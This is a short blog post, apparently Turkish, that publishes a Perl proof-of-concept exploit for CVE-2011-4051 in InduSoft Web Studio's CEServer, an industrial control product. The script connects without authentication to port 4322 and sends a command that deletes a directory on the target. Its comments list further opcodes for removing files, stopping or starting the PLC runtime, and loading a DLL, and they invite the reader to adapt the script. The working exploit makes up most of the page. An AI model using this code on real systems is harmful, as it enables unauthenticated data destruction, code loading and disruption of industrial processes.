magnify
Home Software Security CVE-2011-4051 : Proof of Concept Code
formats

CVE-2011-4051 : Proof of Concept Code

InduSoft Web Studio 6.1 and 7.0 allows unauthenticated users to run commands such as delete/create file, folder and load DLL.

Vulnerability was discovered by Luigi Auriemma

Here is a simple PoC for this vulnerability:


#PoC for CVE-2011-4051
#CEServer Module in InduSoft Web Studio 6.1 and 7.0 allows unauthenticated user to run commands.
#These are ; remove file/directory - send/update file - start/stop runtime project
#and Load DLL into WebStudio process.
#Modify the script to suit your needs.
#Vulnerability discovered by Luigi Auriemma
#http://zerodayinitiative.com/advisories/ZDI-11-330/
#Celil Ünüver
#www.signalsec.com


use IO::Socket;
$host = "192.168.138.128";
$port = 4322;
$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || "Unable to create socket";

$start = "\x07";
$rmvfile = "\x15";
$rmvdir = "\x10";
$dlltag = "\x31";
$sendfile ="\x04";
#0x10 remove directory
#0x15 remove file
#0x01 update a file
#0x08 stop softplc runtime project
#0x07 start softplc runtime project
#0x31 run/load DLL
$data = "C:\\Python24";
$removedir = $rmvdir.$data;
print $sock $removedir;
print "\nOverflow request sent....";
close($sock);

 
 Share on Facebook Share on Twitter Share on Reddit Share on LinkedIn
No Comments  comments 

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*

Şu HTML etiketlerini ve özelliklerini kullanabilirsiniz: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>